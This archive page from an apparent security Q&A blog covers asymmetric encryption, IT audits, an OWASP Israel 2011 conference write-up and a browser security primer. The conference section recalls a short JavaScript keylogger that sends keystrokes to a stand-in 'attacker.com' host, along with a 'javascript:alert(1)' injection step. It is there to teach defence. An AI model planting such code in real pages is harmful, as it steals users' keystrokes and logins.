Archive for September, 2011

QotW #11: Is it possible to have a key for encryption, that cannot be used for decryption?

2011-09-30 by ninefingers. 0 comments

This week’s question of the week was asked by George Bailey, who wanted to know if it were possible to have a key for encryption that could not be used for decryption. This seems at first sight like a simple question, but underneath it there are some cryptographic truths that are interesting to look at.

Firstly, as our first answerer SteveS pointed out, the process of encrypting data according to this model is asymmetric encryption. Steve provided links to several other answers we have. First up from this list was asymmetric vs symmetric encryption. From our answers there, public key cryptography requires two keys, one that can only encrypt material and another which can decrypt material. As was observed in several answers, when compared to straightforward symmetric encryption, the requirement for the public key in public key cryptography creates a large additional burden that depends heavily on careful mathematics, while symmetric key encryption really relies on the confusion and diffusion principle outlined in Shannon’s 1949 Communication Theory of Secrecy Systems. I’ll cover some other points raised in answers later on.

A similarly excellent source of information is what are private and public key cryptography and where are they useful?

So that answered the “is it possible to have such a system” question; the next step is how. This question was asked on the SE network’s Crypto site – how does asymmetric encryption work?. In brief, in the most commonly used asymmetric encryption algorithm (RSA), the core element is a trapdoor function or permutation – a process that is relatively trivial to perform in one direction, but difficult (ideally, impossible, but we’ll discuss that in a minute) to perform in reverse, except for those who own some “insider information” — knowledge of the private key being that information. For this to work, the “insider information” must not be guessable from the outside.

This leads directly into interesting territory on our original question. The next linked answer was what is the mathematical model behind the security claims of symmetric ciphers and hash algorithms. Our accepted answer there by D.W. tells you everything you need to know – essentially, there isn’t one. We only believe these functions are secure based on the fact no vulnerability has yet been found.

The problem then becomes: are asymmetric algorithms “secure”? Let’s take RSA as example. RSA uses a trapdoor permutation, which is raising values to some exponent (e.g. 3) modulo a big non-prime integer (the modulus). Anybody can do that (well, with a computer at least). However, the reverse operation (extracting a cube root) appears to be very hard, except if you know the factorization of the modulus, in which case it becomes easy (again, using a computer). We have no actual proof that factoring the modulus is required to compute a cube root; but more of 30 years of research have failed to come up with a better way. And we have no actual proof either that integer factorization is inherently hard; but that specific problem has been studied for, at least, 2500 years, so easy integer factorization is certainly not obvious. Right now, the best known factorization algorithm is General Number Field Sieve and its cost becomes prohibitive when the modulus grows (current World record is for a 768-bit modulus). So it seems that RSA is secure (with a long enough modulus): breaking it would require to outsmart the best mathematicians in the field. Yet it is conceivable that a new mathematical advance may occur any day, leading to an easy (or at least easier) factorization algorithm. The basis for the security claim remains the same: smart people spent time thinking about it, and found no weakness.

Cryptography offers very few algorithms with mathematically proven security (e.g. One-Time Pad), let alone practical algorithms with mathematically proven security; none of them is an asymmetric encryption algorithm. There is no proof that asymmetric encryption can really exist. But there is no proof that hash functions exist, either, and it never prevented anybody from using hash functions.

Blog promotion afficionado Jeff Ferland provided some extra detail in his answer. Specifically, Jeff addressed which cipher setup should be used for actually encrypting the data, noting that the best setup for most real world scenarios is the combined use of asymmetric and symmetric cryptography as occurs in PGP, for example, where a transfer key encrypts the data using symmetric encryption and that key, a much smaller piece of data, can be effectively be protected by asymmetric encryption; this is often called “hybrid encryption”. The reason asymmetric encryption is not used throughout, aside from speed, is the padding requirement as Jeff himself and this question over on Crypto.SE discusses.

So in conclusion, it is definitely possible to have a key that works only for encryption and not for decryption; it requires mathematical structure, and faith in the difficulty of inverting some of these operations. However, using asymmetric encryption correctly and effectively is one of the biggest challenges in the security field; beyond the maths, private key storage, public key distribution, and key usage without leaking confidential information through careless implementation are very difficult to get right.

QotW #10: Carrying Out an IT Audit

2011-09-23 by Jeff Ferland. 0 comments

This week, a newly-minted master’s degree holder asked on our site, “[How do I go about] Carrying out a professional IT audit procedure?” That’s a really big question in one sentence. In trying to break that down to some parts we can address, let’s look at the perspective people involved in an audit might see.

Staff at an audit client interact with auditors who ask a lot of questions off of a script that is usually referred to as a work plan. Many times, they ask you to open the appropriate settings dialogs or configuration files and show them the configuration details that they are interested in. Management at an audit client will discuss what systems beforehand and the managers for the auditors will select or create appropriate work plans.

The quality, nature, and scope of work plans vary widely, and a single audit will often involve the use of many different plans. Work plans might be written by the audit company or available from regulatory bodies, standards organizations, or software vendors. One example of a readily-available plan is the PCI DSS 2.0 standard. That plan displays both high-level overviews and mid-level configuration requirements across a broad spectrum. Low-level details would be operating system or application specific. Many audit plans related to banking applications have granular detail about core system configuration settings. Also have a look at this question about audit standards for law firms for an example from a different industry showing similarities and differences.

While some plans are regulatory-compliance related, most are best-practices focused. All plans are written with best practices in mind, and for those who are new to the world of IT security, that’s the most challenging part about them. There is no universal standard; many plans greatly overlap, but still differ. If the auditor is appropriately considering their client’s needs, they’ll almost certainly end up marking parts of plans as not applicable or not compliant yet okay because of mitigating circumstances.

Another challenging point for those new to auditing is the sometimes hard-to-grasp concept is the separation between objectives and controls. An objective might be to ensure that each authenticates to their own account. Controls listed in a work plan might include discussion about password expiry requirements to help prevent shared account passwords (among other things). Don’t get crossed-up focusing on the control if the objective is met through some other means – perhaps everybody is using biometric authentication instead. There are too many instances of this in the audit world, and it’s a common mistake among newer auditors.

From a good auditor’s perspective, meeting the goals of the work plan might be considered 60% of the goal of the work. An auditor’s job isn’t complete unless they’re looking at the whole organization. Some examples: to fulfill a question about password change requirements, the auditor should ask an administrator, see the configuration and ask users about it (“When was the last time the system made you change your password?”). To review a system setting, the auditor should ask to see settings in a general manner, adding detail only as needed: “Can you show me the net effect of policies on this user’s account?” as opposed to “Start->run->rsop.msc”. Users reporting different experiences about password resets than the system configuration shows or a system administrator who fumbles their way around for everything won’t ever be in the work plan, but it will be a concern.

With that background in mind, here are some general steps to performing an IT audit procedure:

  • Meet with management and determine their needs. You should understand many of the possible accepted risks before you begin the engagement. For example, high-speed traders may stand to lose more money by implementing a firewall than not.
  • Select appropriate audit plans based on available resources and your own relevant work.
  • Properly review the controls with the objectives they meet in mind. Use multiple references when possible, and always try to confirm any settings directly.
  • Pay attention to the big picture. Things should “feel right.”
  • Review your findings with management and consider their thoughts on them. Many times the apparent severity of something needs to be adjusted.
  • At the end of the day, sometimes a business unit may accept the risk from a weak control, despite it looking severe to you as an auditor. That is their prerogative, as long as you have correctly articulated the risks

The last part of that, auditors reviewing findings with client management, takes the most finesse and unexplainable skill. Does your finding really matter? How can you smooth things over and still deliver over 100 findings? At the end of the day, experience and repetition is the biggest part of delivering professional work, and that’s regardless of the kind of work.

Some further starting points for more detail can be found at http://en.wikipedia.org/wiki/Information_technology_audit_process and http://ithandbook.ffiec.gov/.

OWASP Israel Conference 2011

2011-09-21 by Avi Douglen. 0 comments

This past Thursday, OWASP Israel held their yearly regional conference, just before the larger global AppSec conference in US. The Interdisciplinary Center Herzliya (IDC) was gracious enough to host the conference.

Sec.se was a sponsor there, and in addition provided some great swag – lanyards for the speakers, stickers, and loads of very cool t-shirts (these were gone before the first lecture even started!) Quite a few attendees popped them straight on, and I heard a lot of compliments on the logo design (thanks @Jin!!). Btw, Sec.se didn’t just sponsor the conference – they’re now full OWASP Members, so kudos to the fellows at StackExchange, Inc.! (Still leaves the issue of which OWASP project to sponsor, please share your opinion there!)

There were quite a few sponsors this year, and that enabled us (disclosure: I am a Board Member of the Israel chapter) to put on the biggest regional conference yet: with approximately 500 attendees – including both security professionals and developers – and tracks in parallel, a total of 14 talks, it was a definite success.

It was also a great opportunity for networking, as there were people from all sorts of companies there: security product vendors, other software companies, security consulting firms, government/military, academia… very wide and varied.

The only drawback for me, was missing half the talks – and, running back and forth between the rooms to catch my preferred talks Smile.

Here’s a quick rundown of the the talks I was able to get into, note that most of the presentations are online at https://www.owasp.org/index.php/OWASP_Israel_2011 (and pretty much all of them are actually in English 😉 ).

Opening Words

Ofer Maor, Chapter Chairman, introduced OWASP for those that are new to it: now celebrating 10 years, OWASP is the foremost authority on application security, and provides some great resources to aid developers in creating amazing applications that are also secure. One of the main resources, among the various guides, is the OWASP Top Ten – this is “a broad consensus about what the most critical web application security flaws are.” There are also many open source security projects.

OWASP IL is celebrating its 5th year, and is currently one of the largest chapters… The OWASP IL chapter is also working on translating and updating the OWASP Top 10 into Hebrew (if this is your native language – please give a hand!)

Dr. Anat Bremmler, rep of the IDC, spoke about her commitment to security – her background is in network security, and she believes strongly in appsec. This is why this is the 6th OWASP conference that is taking place in the IDC. On a personal note, I would like to point out that the combination between the industry, specifically the security community, and academia, is a fantastic situation, and will have some wonderful results. Already, students in the IDC usually offer a presentation on some applicable research, as a result of their classwork. OWASP has interest in pushing security education all the way to universities, colleges, and such.

 

Keynote: Composite Applications Over Hybrid Clouds – Enterprise Security Challenges of the IT Supply Chain

Dr. Ethan Hadar, SVP of Corporate Technical Strategy at CA, gave a lightweight keynote address, discussing some challenges in combining the benefits from moving to Cloud Computing for supply chain management, and security requirements and needs. While he really didn’t say anything new, he presented the viewpoint of a CIO, who doesn’t really care much about security, except for compliance issues. Contrast this with other perspectives, such as that of a security manager, an auditor, and the end user… Often, it is the perception of security that matters, and not the actual level of security. While we in the security field would often dismiss that as “security theater”, Dr. Hadar made the case that for some shareholders, this might be what brings the buy-in.

He also brought up an interesting issue, regarding testing “composite applications” (i.e. systems that comprise 3rd party services) or apps hosted on “cloud infrastructure”: how can you test the sub-services? What if these are hosted on IaaS/PaaS/ *aaS etc? Are you even allowed to? In what country? What if your meta-system relies on 3rd party service? What can you do about change management – on the subsystems?

And whose responsibility is it, anyway? Dr. Hadar suggested including security in the contractual SLA…

But then, there are also short-lived apps – what he calls “situational applications”, such as a department pops up a website for a short timeframe.

Overall, not really anything new – but it was more about presenting the questions, providing food for thought…

The CIO doesn’t want security, its like talking to an insurance agent – just something you have to do, we should be making it as painless as possible.

 

Temporal Session Race Conditions

Shay Chen, CTO of Ernst and Young’s Hacktics Advanced Security Center, demoed a new class of attack he’s calling “Temporal Session Race Condition”.

Shay attempted to login to a simple webapp, without a valid password. He overloaded the password field with too much data, causing a momentary delay… In the meantime, he opened another window and tried to jump directly to an internal page. This created a sort of race condition on the session management…

Typically, race conditions would imply some form of latency, causing the intended order of operations to change, or become unpredictable.… In this case, even with no latency extant, the attempt is to create the latency, as needed, in order to enable the attacker to force the race condition.

The success of this attack can be based on what Shay calls “Session Puzzling”. This attack is kinda complex, but in certain scenarios can allow the attacker to subvert the session generation. For example, a webserver will generate a new session id, associate the session id with the memory area, and then store the session id. Of course, this session id is sent to the user’s browser (typically via a cookie, using a Set-Cookie header), which is then reused to find the session memory.

In a Session Puzzle attack, the web app accidentally stores a special flag in the session memory – e.g. in a multi-phase password recovery process. This flag might (and often is) the same flag that is checked by the rest of the application to verify that the user is logged in (for example, a session variable called, surprisingly, “username”).

While this is a relatively simplistic scenario (note that while it shouldn’t happen, it often does, sadly enough) – the more general case, of multi-phase flow control stored in session variables, is quite common. If the session variables used to store the flow control are the same variables used elsewhere, this can be subverted by running two flows, in parallel, without advancing the flow in the expected order (i.e. stop flow A after the first step, then commence flowB and continue through till the end). Likewise, it can be possible in some cases to skip steps in the flow, and jump ahead to a more interesting step – such as the phase where the password can be retrieved.

Shay then went on to discuss techniques to control what he calls “productive latency” – i.e. controlling how much time a specific line of code should take. This will increase the window of opportunity to inject a specific RC, even in cases where (flow-based) Session Puzzling does not apply. For example, what if the logon mechanism stores the username in the session, before verifying the password – and if the password is incorrect, the session is invalidated (in the same function)? This is not a multi-step flow, however by injecting the productive latency, it will be possible to create a race condition (by jumping to an internal page, during the authentication attempt).

These “productive latency” inducing techniques include Regex’s, loops, complex queries, and database connection pool exhaustion. He also introduced a tool (and who doesn’t love tools?) to flood a data access web page, and forcefully occupy the entire connection pool for a given amount of time…

Btw, he also mentioned architecture of two separate systems, that share a backend resource – one app might be able to saturate the backend connections, thus creating latency for the other app.

At the very end, as a sort of appendix, he did discuss ways to detect such vulnerabilities – both in blackbox pentests, and in Code reviews. it really just comes back to finding places where an application-layer DoS is possible, for any of the backend layers – such as a resource or code flow that is controlled by input (direct or indirect).

 

Building an Effective SDLC Program

This was a joint lecture, between Ofer Maor (CTO of Seeker Security, formerly CTO of E&Y’s Hacktics, also the chapter chairman), and Guy Bejerano, CSO of Liveperson. The two presented a case study of the process of implementing an SDL – security development lifecycle. They discussed to their own mutual experience of pulling the Liveperson development staff into SDL (Ofer’s team consulted to Liveperson on this).

One of the key challenges for Liveperson (and indeed, most SaaS providers) is providing a service – which should be secure, of course – in the cloud, and using cloud services. (This calls back to some of the challenges that Dr. Hadar referred to in his keynote). Amongst other issues, many of their high-security customers insisted on performing an external pentest on their service. On the other hand, Liveperson felt the impact of security bugs – friction, costs, reputation damage – but did not really bother to focus on the upside.

Their development started as a standard “Waterfall” process (Gladly, they didn’t eat the lunch of my own later talk, though there is some overlap…) This did present its own challenges, such as accuracy and repetitiveness of testing, and more.

They then decided to switch to an Agile lifecycle, but this created even more friction! (My talk later in the day focused on the difficulties of SDL specifically with Agile.) Ofer shared an anecdote regarding SDL-related friction: he performed pentest for one of the larger US retailers. Finding many instances of SQL Injection and over 40 other vulnerabilities, he was later told that the developers had to work overnight straight through the holiday season, just to fix what was only discovered at the end of the cycle, instead of much earlier.

Guy perceives “SDLC” as “vendor heaven” – with an overload of products, services, and more, you never know what you need, or when it’s enough, right?

They proposed a few key points to focus on, before laying out your SDL:

  • Define your requirements – focus on risk profile, including your customers’ risk requirements (e.g. PCI, HIPAA, etc.). Decide where you need to get to.
  • Select a framework – for a common language, e.g.Liveperson settled on OWASP’s taxonomy.
  • Who leads the program? For a very technical org (such as any software company), it can no longer be just the CSO, but you have to create ownership in the dev teams.

For example, the system owner needs to accept security as one of the operational requirements… and it then becomes his responsibility to deliver. Also, it’s best if you can make security leaders (or “champions”) out of the best programmers.

Security then becomes part of the quality requirement. It can start with QA, by getting them interested / involved in security – then QA can find security bugs, too.

  • Knowledge sharing: there were some changes in the process from what they originally intended. They started off with a mistake, but then realized that they must create awareness. It even came to the point that watercooler talk between programmers, was actually about sql injection.
  • Penetration testing strategy (manual/automatic, blackbox/whitebox, internal/external, etc)
  • Fitting tools to platform/process
  • Operational cycle – Key Performance Indicators (for the SDL), and reviewed by owners

Encouragingly, Guy affirmed that a second round of SDL implementation, with focus on these issues, was a lot more successful.

 

Glass Box Testing – Thinking Inside the Box

Omri Weisman, manager of the Security Research Group in IBM, gave an interesting talk about their research in new forms of automated testing. (Of course, count on IBM that this will eventually be rolled into a high-end product. Btw, one of the other sponsors of the conference, Seeker Security, also has a product in this field, though I have not personally experimented with it yet).

Previously, one of the main options for automated testing was Black Box – based on sending inputs to a closed system, and checking the outputs. One key drawback of this approach, is the difficulty in finding hidden logic – such as magic numbers, secret parameters, and other types. Another challenge for black box testing, are attacks that don’t really have noticeable results – as an example, consider SQL Injection that does not return data. While there are ways around this, such as blind injection or timing attacks, this is often complex and not trivial.

Another important drawback to blackbox testing, is that it is typically very difficult to trace a given issue, back to the line of code that needs to be fixed. Often a programmer, tasked with fixing a vulnerability found in BB, will have to drill down many layers of code, calling functions, configured classes, referenced modules, and pointless comments, until he finds the one single faulty line of code.

So what is GlassBox?

Omri used a very cute video to display this intuitively… Blackbox: sliding an envelope under a closed door, and getting another envelope in response. Glassbox is like sliding the envelope under the door – and then looking through the window, to see a gorilla preparing the response…. 🙂

Or, more succinctly:

Glass Box testing uses internal agents to guide application scanning

Using this direction, GB has a lot more information available – memory, structure, environment, source code, runtime configuration, actual network traffic, access to file-system, registry, database, and much more.

Glassbox offers the capability to do additional tests, that you couldn’t do with straight BB – such as verifying test coverage (an important facet in security assurance), finding hidden parameters and values, backdoors, attacks with no response, DoS, and even generating exploits directly according to the existing input validation.

GB further assists the testing process, by consolidating and correlating similar issues that can be traced back to the same source, thus removing duplicates. GB can also trace the results of the external pentest, back to the specific lines of code, and can also help remove false positives.

Thus, Glassbox testing could solve the black box challenges… and moreover, this would enable an automated PT tool to automatically detect e.g. all OWASP Top 10 issues (typically, BB tools can only discover half).

 

Agile + SDL – Concepts and Misconceptions

Next up was my own talk, together with Nir Bregman from HP, explaining the difficulty in combining an SDL (Security Development Lifecycle) process with Agile methodology – but I will save the content of that for its own post, where I’ll elaborate on the whole idea behind the talk.

Without delving into the content, I will say that I had a blast delivering the talk. After a short introduction to the terminology (for those unfamiliar), we structured the first half of the talk as an aggressive, back-and-forth (modeled after the “yo’ momma” contests of yore), with each of us presenting an ignorant view of the other’s methodology (I defended SDL, as a security pro, and showed great ignorance and pettiness wrt Agile, Nir respectfully displayed immaturity regarding all things security). The second half of the talk, of course, showed how to reconcile the resulting problems, and presented some possibilities of implementing SDL as part of an Agile workflow.

Before that, though, we had a great lunch – thanks to all the sponsors!

 

When Crypto Goes Wrong

Erez Metula (AppSec Labs) is well-known as a great speaker, and he always puts on a great show. This time, he did not disappoint. Though there was not much new meat in his talk, it was a great back-to-basics review of common mistakes that happen when programmers try to implement cryptographic functions. (Overall, I think this was probably the most important talk of the day, at least for the programmers that attended – and at the end of the day, isn’t the whole purpose of OWASP to help programmers implement secure code?).

  • Home grown algorithms
  • Outdated crypto (e.g. MD5, DES)
  • Bad encryption mode, e.g. AES with ECB instead of CBC.
  • Forgetting to verify certificates – e.g. from a rich client, when calling a backend web service, or even more commonly from mobile apps.
  • Not requiring HTTPS (Don’t forget about SSLstrip…)
  • Direct access to server-side crypto functions
  • Direct access to client-side crypto functions (ex: exposed ActiveX crypto)
  • Sending hash values over an insecure transport (such as this recent question)
  • Not using salts (and pepper)
  • Leaving the key with the encrypted secrets
  • Unprotected encryption keys
  • Same symmetric key for all clients
  • Same asymmetric keys for all deployments
  • Same keys, different encryption needs (or “Crypto is not a replacement for access control”)
  • Replaying password hashes
  • Replaying encrypted blocks
  • Combining (or correlating) unrelated encrypted blocks
  • Crypto-DoS – by causing the application to RSA sign large amounts of data

 

Hey, What’s your App doing on my (Smart)Phone?

Shay Zalalichin, CTO of Comsec Consulting (and btw, my former boss 🙂 ), discussed various mobile malware, focusing specifically on the Android platform. Just a note, this was the second out of three talks about mobile security (I missed Itzik Kotler’s talk on hacking mobile apps, but I heard it was great – he also presented results of research that Security Art performed on the most common apps in the iTunes store). This can be taken as a sign of OWASP’s acceptance in a wider role in Application Security, and no longer just Web Apps.

As an example, Shay displayed an Android app (from the Android Market), that simply displays a diamond – if you can’t afford a real diamond, you can’t afford this – but, secretly, the app accesses all the phone logs, outgoing calls, contacts, etc.

His message focused on the fact that today’s phones have a lot more functionality, connectivity – and assets. It’s a stretch to even call it a “phone”… Depending on your viewpoint, phones can provide something computers don’t have (user viewpoint); but they are also really pretty much a mobile computer, with access to the same assets as a regular computer (enterprise management viewpoint).

Whilst the mobile market is finally evolving (“year of the mobile” has been declared several years in a row, but now the stats actually back it up), mobile malware is also evolving. State-of-the-art mobile malware no longer focuses just on “sending premium SMS”, now malware is also actually attacking the mobile device, stored assets, and more. Btw, it is trivial getting malware into the Android market…

Shay explained the Android architecture, it’s security model (based on pieces from both Linux+Java), and Android permissions, based on a thick manifest – which is very much not fine-grained (e.g. an app can be granted “access internet”, but no way to limit that to a single site, and SameOriginPolicy does not apply). Shay also discussed some of the key components of the platform, such as “intents” – basically an IPC mechanism (for intra- and inter-app communication).

Some Android specific attacks: intent sniffing, intent spoofing / injection, insecure storage, privilege manipulation and bypass, and more.

Btw, as he mentioned, OWASP has it’s own mobile security project. Anyway, I don’t think that I will be getting an Android phone anytime soon… 😉

 

The Bank Job II

The final talk of the day was given by Adi Sharabani, Leader of the Rational’s Security Strategy and Architecture team at IBM, ran a very nice demo of a hacker’s (sic) experience.

1 . Know your target

  • Same Origin Policy (SOP), enforced by all common web browsers, prevents a page on a website from directly accessing any other website.
  • There are some ways to overcome SOP:
    • Site vulnerabilities: client side vulnerabilities, Man-in-the-Middle (MitM) – especially over unprotected Wi-Fi
    • Browser vulnerabilities, DNS vulnerabilities, Active MitM

2 . Executing the Attack

1. open URL

2. sleep

3. open `javascript:alert(1)`

But, what else can this vulnerability be used for? E.g. stealing a users session id for some random other site (after login).

E.g. using an external JavaScript file, to request an image on the attacker’s server with the session id in the URL – of course, the image itself is of no interest, however the attacker has already received the user’s session id.

  • Some challenges with the above attack scenario:
    • The victim is not yet authenticated, so stealing the session id would be pointless
    • This would be blocked by HTTPonly cookie attribute.
  • Adi presented a JavaScript based keylogger (in only a handful of lines of code!):

void sendData(char c){

   var img = document.createElement(“img”)

   img.src = ”http://attacker.com/” + c;

   document.body.append(img);

} document.body.onKeyPress = function(event) {sendData(key);}

(Hmm, as I am an IntelliSense cripple, please forgive my memory if there are any syntax errors…)

  • 2-factor authentication would still prevent this attack…
    • Instead, the attacker can embed the attack directly in the client JavaScript, and have no need to steal the session id itself. (Btw, in many cases, the 2-factor authentication is only applied on the authentication page – but further session access would be based on the session id alone…)
  • Based on the above vulnerability + keylogger, a malicious app could easily permanently poison any browser session running on the device! (Adi also showed a workaround for unload events, e.g. if the user closes the browser you don’t want to keep poisoning the session.)

Boom, there you have it – the attacker is now in total control of all browsing you do from your mobile phone…

What an encouraging note to end the day 😀

An accessible overview of browser security

2011-09-20 by ninefingers. 2 comments

So the purpose of this post is to introduce you, an IT-aware but perhaps not software-engineering person, to the various issues surrounding browser security. In order to do this I’ll go quickly through some theory you need to know first and there is some simple C-like pseudocode and the odd bad joke, but otherwise, this isn’t too much of a technical post and you should be able to read it without having to dive into 50 or so books or google every other word. At least, that’s the idea.

What is a browser?

Before we answer that we really need a crash course on kernel internals. It’s not rocket science though, it’s actually very simple. An application on your system runs and is called a process. Each process, for most systems you’re likely to be running, has it’s own address space, which is where everything lives (memory). A process has some code and the operating system (kernel) gives it a set amount of time to run before giving another process some time. How to do that so everything keeps going really would be a technical blog post, so we’ll just skip it. Suffice to say, it’s being constantly improved.

Of course, sometimes you might want to get more than one thing done at once, in which case threads come in. How threads are implemented across OSes is different – on Windows, each process also contains a single, initial thread. If you want to do more things, you can add threads to the process. On Linux, threads and processes are all the same, but they share memory. That’s the real important common idea behind a thread and is also true of Windows – threads share memory, processes do not.

How does my process get stuff done then?

So now we’ve got that out the way, how does your program get stuff done? Well, you can do one of these three things:

  1. If you can do it yourself, as a program, you just do it.
  2. If another library can do it, you might use that.
  3. Or alternatively, you might ask the operating system to do it.

In reality, what might happen is your program asks a library to do it which then asks the operating system to do it. That’s exactly how the C standard library works, for example. The end result, however, and the one we care about, is whether you end up asking the operating system. So you get this:

Operating system  Program

Later on, I’ll make the program side of things slightly more complicated, but let’s move on.

How do we do plugins generically?

Firstly, a word on “shared objects”. Windows calls these dynamic link libraries and they’re very powerful, but all we’re concerned with here really is how they end up working. On the simplest possible level, you might have a function like this:

void parse_html(char* input)
{
    call_to_os();
    do_something_with(input);
}

A shared library might implement a function like this:

void decode_and_play_swf(char* data)
{
    call_to_os();
    do_some_decoding_and_playing_of(data);
}

When a shared object loads with your code, the result, in your program’s memory, is this:

void decode_and_play_swf(char* data)
{
    call_to_os();
    do_some_decoding_and_playing_of(data);
}</p>

<p>void parse_html(char* input)
{
    call_to_os();
    do_something_with(input);
}

Told you it was straightforward. Now, making a plugin work is a little more complicated than that. The program code needs to be able to load the shared object and must expect a standard set of functions be present. For example, a browser might expect a function like this in a plugin:

int plugin_iscompatible(int version)
{
    if ( version <= min_required_version && version <= max_supported_version )
    {
        return 0;
    }
    else
    {
        return -1;
    }
}

Similarly, the app we’re plugging into might offer certain functions that a plugin can call to do things. An example of this would be exactly a browser plugin for drawing custom content to a page – the browser needs to provide the plugin the functionality to do that.

So can all this code do what it likes then?

Well that depends. Basically, when you do this:

Operating system   Program

the operating system doesn’t just do whatever you asked for. In most modern OSes, that program is also run in the context of a given user. So that program can do exactly what the user can do.

I should also point out that for the purposes of loading shared libraries, they appear to most reporting tools as the program they’re running as. After all, they are literally loaded into that program. So when the plugin is doing something, it does it on behalf of the program.

I should also point out that when you load the plugin, it literally gets joined to the memory space of the program. Yes, this is an attack vector called DLL injection, yes you can do bad things but it is also highly useful too.

I read this blog post to know about browsers! What’s all this?

One last point to make. Clearly, browsers run on lots of different platforms. Browsers have to be compiled on each platform, but forcing plugin writers to do that is a bit hostile really. It means many decent plugins might not get written, so browser makers came up with a solution: embed a programming language.

That sounds a lot crazier than it is. Technically, you already have one quite complicated parser already in the browser; you’ve got to support this weird HTML thing (without using regex) – and CSS, and Javascript… wait a minute, given we’ve stuck a programming language parser for javascript into the browser, why don’t we extend that to support plugins?

This is exactly what Mozilla did. See their introductory guide (and as a side note on how good Stack Overflow really is, here’s a Mozilla developer on SO pointing someone to the docs). Actually in truth it’s a little bit more complicated than I made out. Since Firefox already includes an XML/XHTML/HTML parser, the developers went all out – a lot of the user interface can be extended using XUL, an XML variant for that purpose. Technically, you could write an entire user interface in it.

Just as a quick recap, in order for your XML, XHTML, HTML, Javascript, CSS to get things done, it has to do this:

Operating system   Browser   Javascript or something

So, now the browser makes decisions based on what the Javascript asks before it asks the operating system. This has some security implications, which we’ll get to in exactly one more diagram’s time. It’s worth noting that on a broad concept level, languages like Python and Java also work this way:

Operating system   Interpreter/JVM etc  Script/Java Bytecode

Browsers! Focus, please!

Ok, ok. All of that was to enable you to understand the various levels on which a browser can be attacked – you need to understand the difference in locations and the various concepts for this explanation to work, so hopefully we’re there. So let’s get to it.

So, basically, security issues arise for the most part (ignoring some more complicated ones for now) because of bad input. Bad input gets into a program and hopefully crashes it, because the alternative is that specially crafted input makes it do something it shouldn’t and that’s pretty much always a lot worse. So the real aim of the game is evaluating how bad bad input really is. The browser accepts a lot of input on varying levels, so let’s take them turn by turn:

  1. The address bar. You might seriously think, wait, that can’t be a problem can it, but if the browser does not correctly pass the right thing to the “page getting” bit, or the “page getting” bit doesn’t error when it gets bad input, you have a problem, because all the links all over the input are going to break your browser. Believe it or not, in the early days of Internet Explorer, this was actually an issue that could lead you to believe you were on a different site to the one you thought you were on. See here. These days, this particular attack vector is more of a phishing/spoofing style problem than browser manufacturers getting it wrong.

  2. Content parsers. For content parsing I mean all the bits that make it up – html, xhtml, javascript, css. If there are bugs in these, the best case scenario is really that the browser crashes. However, you might be able to get the browser to do something it shouldn’t with a specially crafted web page, javascript or CSS file. Technically speaking, the browser should prevent the javascript it is executing from doing anything too malicious to your system. That’s the idea. The browser will also prevent said javascript from doing anything too malicious to other pages too. A full discussion of web vulnerabilities like this is a blog post in itself, really so we won’t cover it here.

  3. Extensions in Javascript/whatever the browser uses. Again, this comes down to are the vulnerabilities in the parser/enforcement rules. Otherwise, an extension of this nature will have more “power” than an in page Javascript, but still won’t be able to do too much “bad stuff”.

  4. Binary formats in the rendering engine. Clearly, a web page is more than just parseable programming-language like things – it’s also images in a whole variety of complicated formats. A bug in these processors might be exploitable; given they’re written as native functions inside the browser, or as shared libraries the browser uses, the responsibility for access control is at the OS level and so a renderer that is persuaded to do something bad could do anything the user running the process can do.

  5. Extensions (Firefox plugins)/File format handlers. These enable the browser to do things it can’t do in and of itself and are often developed externally to the core “browsing” part. Examples of this are embedding adobe reader in web pages and displaying flash applications. Again, these have decoders or parsers, so bugs in these can persuade the plugin to ask the operating system to do what we want it to do, rather than what it should.

You might wonder if 4 and 5 really should be subject to the same protections afforded to the javascript part. Well, the interesting thing is, that is part of the solution, but you can’t really do it in Javascript, because compared to having direct access to memory and the operating system, it would be much slower. Clearly, that’s a problem for video decoding and really heavy duty graphical applications such as flash is often used for, so plugins are and were the solution.

Ok, ok, tell me, what’s the worst the big bad hacker can do?

Depends. There are two really lucrative possible exploits from bugs of this sort; either, arbitrary code execution (do what you want) or drive by downloading (which is basically, send code that downloads something, then run it). In and of itself, the fact that you’re browsing as a restricted user and not an administrator (right?) means the damage the attacker can do is limited to what your user can do. That could be fairly critical, including infecting all your files with malware, deleting stuff, whatever it is they want. You might then unwittingly pass on the infection.

The real problem, however, is that the attacker can use this downloaded code as a launch platform to attack more important parts. A full discussion of botnets, rootkits and persistent malware really ought to also be a separate blog post, but let’s just say the upshot is your computer could be taking part in attacks on other computers orchestrated by criminal gangs. Serious then.

Oh my unicorns, why haven’t you developers fixed this?

First up, no piece of code is entirely perfect. The problem with large software projects is that they become almost too complicated for one person to understand every part and every change that is going on. So the project is split up with maintainers for each part and coding standards, rules, guidelines, tools you must run and that must pass, tests you must run and must pass etc. In my experience, this improves things, but no matter how much you throw at it in terms of management, you’re still dealing with humans writing programs. So mistakes happen.

However, our increasing reliance on the web has got armies of security people of the friendly, helpful sort trying to fix the problem, including people who build browsers. I went at great lengths to discuss threads and processes – there was a good reason for that, because now I can discuss what google chrome tries to do.

Ok…

So as I said, the traditional way you think about building an application when you want to do more than one thing at once is to use threads. You can store your data in memory and any thread can get it (I’m totally ignoring a whole series of problems you can encounter with this for simplicity, but if you’re a budding programmer, read up on concurrency before just trying this) reasonably easily. So when you load a page and run a download, both can happen at once and the operating system makes it look like they’re both happening at the same time.

Any bugs from 2-5, however, can affect this whole process. There’s nothing to stop a plugin waltzing over and modifying the memory of the parser, or totally replacing it, or well, anything. Also, a crash in a single thread in a program tends to bring the whole thing down, so from a stability point of view, it can also be a problem. Here’s a nice piece of ascii art:

|-----------------------------------------------------------------------|
| Process no 3412  Thread/parsing security.blogoverflow.com             |
|  Big pile of     Thread/rendering PNG                                 |
|  shared memory   Thread/running flash plugin - video from youtube     |
|-----------------------------------------------------------------------|
So, all that code is in the same space (memory address) as each other, basically. Simple enough.

The Chrome developers looked at this and decided it was a really bad idea. For starters, there’s the stability problem – plugins do crash fairly frequently, especially if you’ve ever used the 64-bit flash plugin for linux. That might take the whole process down, or it might cause something else to happen, who knows.

The Chrome model executes sub-processes for each site to be rendered (displayed) and for every plugin in use, like this:

   |--------------------------|       |-----------------------------------|
   | Master chrome            |-------| Rendering process for security....|
   | process. User interface  |       |-----------------------------------|
   | May also use threads     |
   |--------------------------|-------|-----------------------------------|
                |                     | Rendering process for somesite... |
   |--------------------------|       |-----------------------------------|
   | Flash plugin process     |
   |--------------------------|
So now what happens is the master process becomes only the user interface. Child processes actually do the work, but if they get bad input, they die and don’t bring the whole browser down.

